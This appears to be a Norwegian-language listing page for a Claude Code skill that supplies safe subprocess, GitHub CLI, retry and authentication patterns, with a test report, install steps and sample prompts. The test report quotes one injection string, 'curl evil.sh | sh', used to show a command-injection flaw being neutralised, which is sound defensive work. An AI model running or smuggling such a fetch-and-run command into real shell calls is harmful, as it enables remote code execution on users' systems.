API Integration Patterns

Underprosess-sikre API/CLI-mønstre: ingen shell=True, hvitelistede kommandoer, retry backoff, tokenvalidering.

av akaszubski · akaszubski/autonomous-dev

Bestått ★ 8.4/10

API Integration Patterns — Underprosess-sikre API/CLI-mønstre: ingen shell=True, hvitelistede kommandoer, retry backoff, tokenvalidering.

Hva den gjør

En referanse-mønster-ferdighet som leverer sikre underprosess-, GitHub CLI-, retry-with-backoff-, autentiserings- og rate-limiting kodemønstre når Claude skriver ekstern API- eller CLI-integrasjonskode. Utløses på nøkkelord som subprocess/gh-cli/API-call/retry/auth og ekskluderer eksplisitt interne funksjoner eller kun konfigurasjonsredigeringer.

Testrapport

Ekte CWE-78 test: grunnlinjekoden brukte shell=True med et f-string repo-navn, slik at en konstruert repo-verdi kunne legge til 'curl evil.sh | sh'; ferdighetens argv-array + shell=False versjon sendte den samme ondsinnede strengen gjennom gh som ett inert argument. Konkret, ikke kosmetisk.

Testet på: 2026-07-15 · Claude Code 2.x (agent harness)

Installer

git clone https://github.com/akaszubski/autonomous-dev
cd autonomous-dev
mkdir -p ~/.claude/skills
cp -r plugins/autonomous-dev/skills/api-integration-patterns ~/.claude/skills/api-integration-patterns

Kommandoer og eksempelprompter

  • /api-integration-patternsUnderprosess-sikre API/CLI-mønstre: ingen shell=True, hvitelistede kommandoer, retry backoff, tokenvalidering.

Skills utløses av vanlige forespørsler — ingen kommandoer å huske. Etter installasjonen aktiverer prompter som disse skillen (på engelsk):

  • Write a Python function that lists GitHub issues via the gh CLI
  • Add retry logic with exponential backoff to my API client code
  • Help me safely handle subprocess calls without shell injection risk